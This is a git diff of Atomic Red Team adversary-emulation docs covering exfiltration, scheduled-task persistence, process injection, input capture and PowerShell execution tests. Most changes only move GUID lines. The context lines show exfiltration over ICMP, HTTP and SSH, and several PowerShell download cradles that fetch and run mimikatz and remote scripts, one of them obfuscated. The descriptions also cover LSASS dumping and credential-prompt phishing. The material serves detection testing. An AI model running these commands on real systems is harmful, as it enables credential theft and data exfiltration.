## Atomic Test #2 - Exfiltration Over Alternative Protocol - ICMP - -auto_generated_guid: dd4b4421-2e25-4593-90ae-7021947ad12e - Exfiltration of specified file over ICMP protocol. Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** dd4b4421-2e25-4593-90ae-7021947ad12e + + + #### Inputs: @@ -90,13 +94,15 @@ $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Cont
## Atomic Test #3 - Exfiltration Over Alternative Protocol - DNS - -auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45 - Exfiltration of specified file over DNS protocol. + **Supported Platforms:** Linux +**auto_generated_guid:** c403b5a4-b5fc-49f2-b181-d1c80d27db45 + + + #### Run it with these steps! @@ -122,14 +128,16 @@ Exfiltration of specified file over DNS protocol.
## Atomic Test #4 - Exfiltration Over Alternative Protocol - HTTP - -auto_generated_guid: 6aa58451-1121-4490-a8e9-1dada3f1c68c - Exfiltration of specified file over HTTP. Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 6aa58451-1121-4490-a8e9-1dada3f1c68c + + + #### Inputs: @@ -156,14 +164,16 @@ Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
## Atomic Test #5 - Exfiltration Over Alternative Protocol - SMTP - -auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9 - Exfiltration of specified file over SMTP. Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** ec3a835e-adca-4c7c-88d2-853b69c11bb9 + + + #### Inputs: diff --git a/atomics/T1048/T1048.md b/atomics/T1048/T1048.md index e60fdc42..53137544 100644 --- a/atomics/T1048/T1048.md +++ b/atomics/T1048/T1048.md @@ -16,17 +16,19 @@ Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network pr
## Atomic Test #1 - Exfiltration Over Alternative Protocol - SSH - -auto_generated_guid: f6786cc8-beda-4915-a4d6-ac2f193bb988 - Input a domain and test Exfiltration over SSH Remote to Local Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** f6786cc8-beda-4915-a4d6-ac2f193bb988 + + + #### Inputs: @@ -51,17 +53,19 @@ ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
## Atomic Test #2 - Exfiltration Over Alternative Protocol - SSH - -auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268 - Input a domain and test Exfiltration over SSH Local to Remote Upon successful execution, tar will compress /Users/* directory and password protect the file modification of `Users.tar.gz.enc` as output. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 7c3cb337-35ae-4d06-bf03-3032ed2ec268 + + + #### Inputs: diff --git a/atomics/T1049/T1049.md b/atomics/T1049/T1049.md index 192508b7..edc081e0 100644 --- a/atomics/T1049/T1049.md +++ b/atomics/T1049/T1049.md @@ -20,15 +20,17 @@ Utilities and commands that acquire this information include [netstat](https://a
## Atomic Test #1 - System Network Connections Discovery - -auto_generated_guid: 0940a971-809a-48f1-9c4d-b1d785e96ee5 - Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 0940a971-809a-48f1-9c4d-b1d785e96ee5 + + + @@ -50,15 +52,17 @@ net sessions
## Atomic Test #2 - System Network Connections Discovery with PowerShell - -auto_generated_guid: f069f0f1-baad-4831-aa2b-eddac4baac4a - Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** f069f0f1-baad-4831-aa2b-eddac4baac4a + + + @@ -78,15 +82,17 @@ Get-NetTCPConnection
## Atomic Test #3 - System Network Connections Discovery Linux & MacOS - -auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 - Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 + + + @@ -119,15 +125,17 @@ echo "Install netstat on the machine."; exit 1;
## Atomic Test #4 - System Discovery using SharpView - -auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9 - Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe . Results will output via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 96f974bb-a0da-4d87-a744-ff33e73367e9 + + + #### Inputs: diff --git a/atomics/T1053.001/T1053.001.md b/atomics/T1053.001/T1053.001.md index 77547ae1..64bdb473 100644 --- a/atomics/T1053.001/T1053.001.md +++ b/atomics/T1053.001/T1053.001.md @@ -12,13 +12,15 @@ An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux envi
## Atomic Test #1 - At - Schedule a job - -auto_generated_guid: 7266d898-ac82-4ec0-97c7-436075d0d08e - This test submits a command to be run in the future by the `at` daemon. + **Supported Platforms:** Linux +**auto_generated_guid:** 7266d898-ac82-4ec0-97c7-436075d0d08e + + + #### Inputs: diff --git a/atomics/T1053.002/T1053.002.md b/atomics/T1053.002/T1053.002.md index 0e22c703..615c84dd 100644 --- a/atomics/T1053.002/T1053.002.md +++ b/atomics/T1053.002/T1053.002.md @@ -14,16 +14,18 @@ Note: The at.exe command line utility has been deprecated in curren
## Atomic Test #1 - At.exe Scheduled task - -auto_generated_guid: 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 - Executes cmd.exe Note: deprecated in Windows 8+ Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time. + **Supported Platforms:** Windows +**auto_generated_guid:** 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 + + + diff --git a/atomics/T1053.003/T1053.003.md b/atomics/T1053.003/T1053.003.md index 47c5272a..dd2cfbef 100644 --- a/atomics/T1053.003/T1053.003.md +++ b/atomics/T1053.003/T1053.003.md @@ -16,13 +16,15 @@ An adversary may use cron in Linux or Unix environments to execute
## Atomic Test #1 - Cron - Replace crontab with referenced file - -auto_generated_guid: 435057fb-74b1-410e-9403-d81baf194f75 - This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 435057fb-74b1-410e-9403-d81baf194f75 + + + #### Inputs: @@ -53,13 +55,15 @@ crontab /tmp/notevil
## Atomic Test #2 - Cron - Add script to all cron subfolders - -auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 - This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 + + + #### Inputs: @@ -95,13 +99,15 @@ rm /etc/cron.weekly/#{cron_script_name}
## Atomic Test #3 - Cron - Add script to /var/spool/cron/crontabs/ folder - -auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 - This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. + **Supported Platforms:** Linux +**auto_generated_guid:** 2d943c18-e74a-44bf-936f-25ade6cccab4 + + + #### Inputs: diff --git a/atomics/T1053.004/T1053.004.md b/atomics/T1053.004/T1053.004.md index bed322f3..3692545d 100644 --- a/atomics/T1053.004/T1053.004.md +++ b/atomics/T1053.004/T1053.004.md @@ -12,13 +12,15 @@ An adversary may use the launchd daemon in macOS environments to sc
## Atomic Test #1 - Event Monitor Daemon Persistence - -auto_generated_guid: 11979f23-9b9d-482a-9935-6fc9cd022c3e - This test adds persistence via a plist to execute via the macOS Event Monitor Daemon. + **Supported Platforms:** macOS +**auto_generated_guid:** 11979f23-9b9d-482a-9935-6fc9cd022c3e + + + #### Inputs: diff --git a/atomics/T1053.005/T1053.005.md b/atomics/T1053.005/T1053.005.md index 9fd444d6..5c41ae1d 100644 --- a/atomics/T1053.005/T1053.005.md +++ b/atomics/T1053.005/T1053.005.md @@ -24,14 +24,16 @@ An adversary may use Windows Task Scheduler to execute programs at system startu
## Atomic Test #1 - Scheduled Task Startup Script - -auto_generated_guid: fec27f65-db86-4c2d-b66c-61945aee87c2 - Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view the tasks, open the Task Scheduler and look in the Active Tasks pane. + **Supported Platforms:** Windows +**auto_generated_guid:** fec27f65-db86-4c2d-b66c-61945aee87c2 + + + @@ -57,13 +59,15 @@ schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1
## Atomic Test #2 - Scheduled task Local - -auto_generated_guid: 42f53695-ad4a-4546-abb6-7d837f644a71 - Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. + **Supported Platforms:** Windows +**auto_generated_guid:** 42f53695-ad4a-4546-abb6-7d837f644a71 + + + #### Inputs: @@ -93,15 +97,17 @@ SCHTASKS /Delete /TN spawn /F >nul 2>&1
## Atomic Test #3 - Scheduled task Remote - -auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd - Create a task on a remote system. Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. + **Supported Platforms:** Windows +**auto_generated_guid:** 2e5eac3e-327b-4a88-a0c0-c4057039a8dd + + + #### Inputs: @@ -134,15 +140,17 @@ SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task"
## Atomic Test #4 - Powershell Cmdlet Scheduled Task - -auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd - Create an atomic scheduled task that leverages native powershell cmdlets. Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. + **Supported Platforms:** Windows +**auto_generated_guid:** af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd + + + @@ -171,14 +179,16 @@ Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1
## Atomic Test #5 - Task Scheduler via VBA - -auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 - This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within 30 - 40 seconds after this module has run + **Supported Platforms:** Windows +**auto_generated_guid:** ecd3fa21-7792-41a2-8726-2c5c673414d3 + + + #### Inputs: @@ -222,13 +232,15 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #6 - WMI Invoke-CimMethod Scheduled Task - -auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b - Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. + **Supported Platforms:** Windows +**auto_generated_guid:** e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b + + + diff --git a/atomics/T1053.006/T1053.006.md b/atomics/T1053.006/T1053.006.md index 998c17fb..1c020d8c 100644 --- a/atomics/T1053.006/T1053.006.md +++ b/atomics/T1053.006/T1053.006.md @@ -14,13 +14,15 @@ An adversary may use systemd timers to execute malicious code at system startup
## Atomic Test #1 - Create Systemd Service and Timer - -auto_generated_guid: f4983098-bb13-44fb-9b2c-46149961807b - This test creates Systemd service and timer then starts and enables the Systemd timer + **Supported Platforms:** Linux +**auto_generated_guid:** f4983098-bb13-44fb-9b2c-46149961807b + + + #### Inputs: diff --git a/atomics/T1053.007/T1053.007.md b/atomics/T1053.007/T1053.007.md index eefb07ca..fc86bcbc 100644 --- a/atomics/T1053.007/T1053.007.md +++ b/atomics/T1053.007/T1053.007.md @@ -14,13 +14,15 @@ In Kubernetes, a CronJob may be used to schedule a Job that runs one or more con
## Atomic Test #1 - ListCronjobs - -auto_generated_guid: ddfb0bc1-3c3f-47e9-a298-550ecfefacbd - Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** ddfb0bc1-3c3f-47e9-a298-550ecfefacbd + + + #### Inputs: @@ -45,13 +47,15 @@ kubectl get cronjobs -n #{namespace}
## Atomic Test #2 - CreateCronjob - -auto_generated_guid: f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 - Kubernetes Job is a controller that creates one or more pods and ensures that a specified number of them successfully terminate. Kubernetes Job can be used to run containers that perform finite tasks for batch jobs. Kubernetes CronJob is used to schedule Jobs. Attackers may use Kubernetes CronJob for scheduling execution of malicious code that would run as a container in the cluster. + **Supported Platforms:** Linux, macOS +**auto_generated_guid:** f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 + + + #### Inputs: diff --git a/atomics/T1055.001/T1055.001.md b/atomics/T1055.001/T1055.001.md index 76a8f433..c014cfde 100644 --- a/atomics/T1055.001/T1055.001.md +++ b/atomics/T1055.001/T1055.001.md @@ -16,16 +16,18 @@ Running code in the context of another process may allow access to the process's
## Atomic Test #1 - Process Injection via mavinject.exe - -auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254 - Windows 10 Utility To Inject DLLS. Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. With default arguments, expect to see a MessageBox, with notepad's icon in taskbar. + **Supported Platforms:** Windows +**auto_generated_guid:** 74496461-11a1-4982-b439-4d87a550d254 + + + #### Inputs: diff --git a/atomics/T1055.004/T1055.004.md b/atomics/T1055.004/T1055.004.md index a007e2cc..06a329a9 100644 --- a/atomics/T1055.004/T1055.004.md +++ b/atomics/T1055.004/T1055.004.md @@ -16,9 +16,6 @@ Running code in the context of another process may allow access to the process's
## Atomic Test #1 - Process Injection via C# - -auto_generated_guid: 611b39b7-e243-4c81-87a4-7145a90358b1 - Process Injection using C# reference: https://github.com/pwndizzle/c-sharp-memory-injection Excercises Five Techniques @@ -28,9 +25,14 @@ Excercises Five Techniques 4. IatInjection 5. ThreadHijack Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 techniques. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** 611b39b7-e243-4c81-87a4-7145a90358b1 + + + #### Inputs: diff --git a/atomics/T1055.012/T1055.012.md b/atomics/T1055.012/T1055.012.md index e514407f..df2fa1a2 100644 --- a/atomics/T1055.012/T1055.012.md +++ b/atomics/T1055.012/T1055.012.md @@ -16,14 +16,16 @@ This is very similar to [Thread Local Storage](https://attack.mitre.org/techniqu
## Atomic Test #1 - Process Hollowing using PowerShell - -auto_generated_guid: 562427b4-39ef-4e8c-af88-463a78e70b9c - This test uses PowerShell to create a Hollow from a PE on disk with explorer as the parent. Credit to FuzzySecurity (https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Start-Hollow.ps1) + **Supported Platforms:** Windows +**auto_generated_guid:** 562427b4-39ef-4e8c-af88-463a78e70b9c + + + #### Inputs: @@ -57,13 +59,15 @@ Stop-Process -Name "#{spawnto_process_name}" -ErrorAction Ignore
## Atomic Test #2 - RunPE via VBA - -auto_generated_guid: 3ad4a037-1598-4136-837c-4027e4fa319b - This module executes notepad.exe from within the WINWORD.EXE process + **Supported Platforms:** Windows +**auto_generated_guid:** 3ad4a037-1598-4136-837c-4027e4fa319b + + + #### Inputs: diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md index 48f20359..453192f3 100644 --- a/atomics/T1055/T1055.md +++ b/atomics/T1055/T1055.md @@ -16,17 +16,19 @@ More sophisticated samples may perform multiple process injections to segment mo
## Atomic Test #1 - Shellcode execution via VBA - -auto_generated_guid: 1c91e740-1729-4329-b779-feba6e71d048 - This module injects shellcode into a newly created process and executes. By default the shellcode is created, with Metasploit, for use on x86-64 Windows 10 machines. Note: Due to the way the VBA code handles memory/pointers/injection, a 64bit installation of Microsoft Office is required. + **Supported Platforms:** Windows +**auto_generated_guid:** 1c91e740-1729-4329-b779-feba6e71d048 + + + @@ -65,16 +67,18 @@ Write-Host "You will need to install Microsoft Word (64-bit) manually to meet th
## Atomic Test #2 - Remote Process Injection in LSASS via mimikatz - -auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83 - Use mimikatz to remotely (via psexec) dump LSASS process content for RID 500 via code injection (new thread). It must be executed in the context of a user who is privileged on remote `machine`. The effect of `/inject` is explained in + **Supported Platforms:** Windows +**auto_generated_guid:** 3203ad24-168e-4bec-be36-f79b13ef8a83 + + + #### Inputs: diff --git a/atomics/T1056.001/T1056.001.md b/atomics/T1056.001/T1056.001.md index f0ac2787..76f5881a 100644 --- a/atomics/T1056.001/T1056.001.md +++ b/atomics/T1056.001/T1056.001.md @@ -20,17 +20,19 @@ Keylogging is the most prevalent type of input capture, with many different ways
## Atomic Test #1 - Input Capture - -auto_generated_guid: d9b633ca-8efb-45e6-b838-70f595c6ae26 - Utilize PowerShell and external resource to capture keystrokes [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/src/Get-Keystrokes.ps1) Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1) Upon successful execution, Powershell will execute `Get-Keystrokes.ps1` and output to key.log. + **Supported Platforms:** Windows +**auto_generated_guid:** d9b633ca-8efb-45e6-b838-70f595c6ae26 + + + #### Inputs: @@ -60,17 +62,19 @@ Remove-Item $env:TEMP\key.log -ErrorAction Ignore
## Atomic Test #2 - Living off the land Terminal Input Capture on Linux with pam.d - -auto_generated_guid: 9c6bdb34-a89f-4b90-acb1-5970614c711b - Pluggable Access Module, which is present on all modern Linux systems, generally contains a library called pam_tty_audit.so which logs all keystrokes for the selected users and sends it to audit.log. All terminal activity on any new logins would then be archived and readable by an adversary with elevated privledges. Passwords hidden by the console can also be logged, with 'log_passwd' as in this example. If root logging is enabled, then output from any process which is later started by root is also logged, even if this policy is carefully enabled (e.g. 'disable=*' as the initial command). Use 'aureport --tty' or other audit.d reading tools to read the log output, which is binary. Mac OS does not currently contain the pam_tty_audit.so library. + **Supported Platforms:** Linux +**auto_generated_guid:** 9c6bdb34-a89f-4b90-acb1-5970614c711b + + + diff --git a/atomics/T1056.002/T1056.002.md b/atomics/T1056.002/T1056.002.md index 4cedb33c..fa8c19e0 100644 --- a/atomics/T1056.002/T1056.002.md +++ b/atomics/T1056.002/T1056.002.md @@ -14,14 +14,16 @@ Adversaries may mimic this functionality to prompt users for credentials with a
## Atomic Test #1 - AppleScript - Prompt User for Password - -auto_generated_guid: 76628574-0bc1-4646-8fe2-8f4427b47d15 - Prompt User for Password (Local Phishing) Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.html + **Supported Platforms:** macOS +**auto_generated_guid:** 76628574-0bc1-4646-8fe2-8f4427b47d15 + + + @@ -41,15 +43,17 @@ osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Pr
## Atomic Test #2 - PowerShell - Prompt User for Password - -auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 - Prompt User for Password (Local Phishing) as seen in Stitch RAT. Upon execution, a window will appear for the user to enter their credentials. Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py + **Supported Platforms:** Windows +**auto_generated_guid:** 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 + + + diff --git a/atomics/T1056.004/T1056.004.md b/atomics/T1056.004/T1056.004.md index f9fef8ef..b3eab452 100644 --- a/atomics/T1056.004/T1056.004.md +++ b/atomics/T1056.004/T1056.004.md @@ -15,13 +15,15 @@
## Atomic Test #1 - Hook PowerShell TLS Encrypt/Decrypt Messages - -auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 - Hooks functions in PowerShell to read TLS Communications + **Supported Platforms:** Windows +**auto_generated_guid:** de1934ea-1fbf-425b-8795-65fb27dd7e33 + + + #### Inputs: diff --git a/atomics/T1057/T1057.md b/atomics/T1057/T1057.md index 40a1227b..68e6c297 100644 --- a/atomics/T1057/T1057.md +++ b/atomics/T1057/T1057.md @@ -14,15 +14,17 @@ In Windows environments, adversaries could obtain details on running processes u
## Atomic Test #1 - Process Discovery - ps - -auto_generated_guid: 4ff64f0b-aaf2-4866-b39d-38d9791407cc - Utilize ps to identify processes. Upon successful execution, sh will execute ps and output to /tmp/loot.txt. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 4ff64f0b-aaf2-4866-b39d-38d9791407cc + + + #### Inputs: @@ -52,15 +54,17 @@ rm #{output_file}
## Atomic Test #2 - Process Discovery - tasklist - -auto_generated_guid: c5806a4f-62b8-4900-980b-c7ec004e9908 - Utilize tasklist to identify processes. Upon successful execution, cmd.exe will execute tasklist.exe to list processes. Output will be via stdout. + **Supported Platforms:** Windows +**auto_generated_guid:** c5806a4f-62b8-4900-980b-c7ec004e9908 + + + diff --git a/atomics/T1059.001/T1059.001.md b/atomics/T1059.001/T1059.001.md index aa9120ec..d86d109d 100644 --- a/atomics/T1059.001/T1059.001.md +++ b/atomics/T1059.001/T1059.001.md @@ -50,13 +50,15 @@ PowerShell commands/scripts can also be executed without directly invoking the <
## Atomic Test #1 - Mimikatz - -auto_generated_guid: f3132740-55bc-48c4-bcc0-758a459cd027 - Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** f3132740-55bc-48c4-bcc0-758a459cd027 + + + #### Inputs: @@ -81,15 +83,17 @@ powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invo
## Atomic Test #2 - Run BloodHound from local disk - -auto_generated_guid: a21bb23e-e677-4ee7-af90-6931b57b6350 - Upon execution SharpHound will be downloaded to disk, imported and executed. It will set up collection methods, run and then compress and store the data to the temp directory on the machine. If system is unable to contact a domain, proper execution will not occur. Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file. + **Supported Platforms:** Windows +**auto_generated_guid:** a21bb23e-e677-4ee7-af90-6931b57b6350 + + + #### Inputs: @@ -133,15 +137,17 @@ Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804
## Atomic Test #3 - Run Bloodhound from Memory using Download Cradle - -auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7 - Upon execution SharpHound will load into memory and execute against a domain. It will set up collection methods, run and then compress and store the data to the temp directory. If system is unable to contact a domain, proper execution will not occur. Successful execution will produce stdout message stating "SharpHound Enumeration Completed". Upon completion, final output will be a *BloodHound.zip file. + **Supported Platforms:** Windows +**auto_generated_guid:** bf8c1441-4674-4dab-8e4e-39d93d08f9b7 + + + @@ -168,13 +174,15 @@ Remove-Item $env:Temp\*BloodHound.zip -Force
## Atomic Test #4 - Obfuscation Tests - -auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804 - Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" + **Supported Platforms:** Windows +**auto_generated_guid:** 4297c41a-8168-4138-972d-01f3ee92c804 + + + @@ -196,13 +204,15 @@ Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set
## Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeys - -auto_generated_guid: af1800cf-9f9d-4fd1-a709-14b1e6de020d - Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** af1800cf-9f9d-4fd1-a709-14b1e6de020d + + + @@ -222,15 +232,17 @@ $url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b10
## Atomic Test #6 - Invoke-AppPathBypass - -auto_generated_guid: 06a220b6-7e29-4bd8-9d07-5b4d86742372 - Note: Windows 10 only. Upon execution windows backup and restore window will be opened. Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ + **Supported Platforms:** Windows +**auto_generated_guid:** 06a220b6-7e29-4bd8-9d07-5b4d86742372 + + + @@ -250,15 +262,17 @@ Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githu
## Atomic Test #7 - Powershell MsXml COM object - with prompt - -auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da - Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed. Provided by https://github.com/mgreen27/mgreen27.github.io + **Supported Platforms:** Windows +**auto_generated_guid:** 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da + + + #### Inputs: @@ -283,15 +297,17 @@ powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.S
## Atomic Test #8 - Powershell XML requests - -auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6 - Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed. Provided by https://github.com/mgreen27/mgreen27.github.io + **Supported Platforms:** Windows +**auto_generated_guid:** 4396927f-e503-427b-b023-31049b9b09a6 + + + #### Inputs: @@ -316,15 +332,17 @@ Provided by https://github.com/mgreen27/mgreen27.github.io
## Atomic Test #9 - Powershell invoke mshta.exe download - -auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af - Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!". Provided by https://github.com/mgreen27/mgreen27.github.io + **Supported Platforms:** Windows +**auto_generated_guid:** 8a2ad40b-12c7-4b25-8521-2737b0a415af + + + #### Inputs: @@ -349,14 +367,16 @@ C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}'
## Atomic Test #10 - Powershell Invoke-DownloadCradle - -auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 - Provided by https://github.com/mgreen27/mgreen27.github.io Invoke-DownloadCradle is used to generate Network and Endpoint artifacts. + **Supported Platforms:** Windows +**auto_generated_guid:** cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 + + + #### Run it with these steps! @@ -373,14 +393,16 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
## Atomic Test #11 - PowerShell Fileless Script Execution - -auto_generated_guid: fa050f5e-bc75-4230-af73-b6fd7852cd73 - Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that art-marker.txt is in the folder. + **Supported Platforms:** Windows +**auto_generated_guid:** fa050f5e-bc75-4230-af73-b6fd7852cd73 + + + @@ -407,15 +429,17 @@ Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore
## Atomic Test #12 - PowerShell Downgrade Attack - -auto_generated_guid: 9148e7c4-9356-420e-a416-e896e9c0f73e - This test requires the manual installation of PowerShell V2. Attempts to run powershell commands in version 2.0 https://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/ + **Supported Platforms:** Windows +**auto_generated_guid:** 9148e7c4-9356-420e-a416-e896e9c0f73e + + + @@ -447,13 +471,15 @@ Write-Host Automated installer not implemented yet, please install PowerShell v
## Atomic Test #13 - NTFS Alternate Data Stream Access - -auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 - Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 + + + #### Inputs: @@ -496,14 +522,16 @@ Write-Host Prereq's for this test cannot be met automatically
## Atomic Test #14 - PowerShell Session Creation and Use - -auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd - Connect to a remote powershell session and interact with the host. Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 7c1acec2-78fa-4305-a3e0-db2a54cddecd + + + #### Inputs: @@ -550,13 +578,15 @@ Enable-PSRemoting
## Atomic Test #15 - ATHPowerShellCommandLineParameter -Command parameter variations - -auto_generated_guid: 686a9785-f99b-41d4-90df-66ed515f81d7 - Executes powershell.exe with variations of the -Command parameter + **Supported Platforms:** Windows +**auto_generated_guid:** 686a9785-f99b-41d4-90df-66ed515f81d7 + + + #### Inputs: @@ -596,13 +626,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #16 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments - -auto_generated_guid: 1c0a870f-dc74-49cf-9afc-eccc45e58790 - Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied + **Supported Platforms:** Windows +**auto_generated_guid:** 1c0a870f-dc74-49cf-9afc-eccc45e58790 + + + #### Inputs: @@ -643,13 +675,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
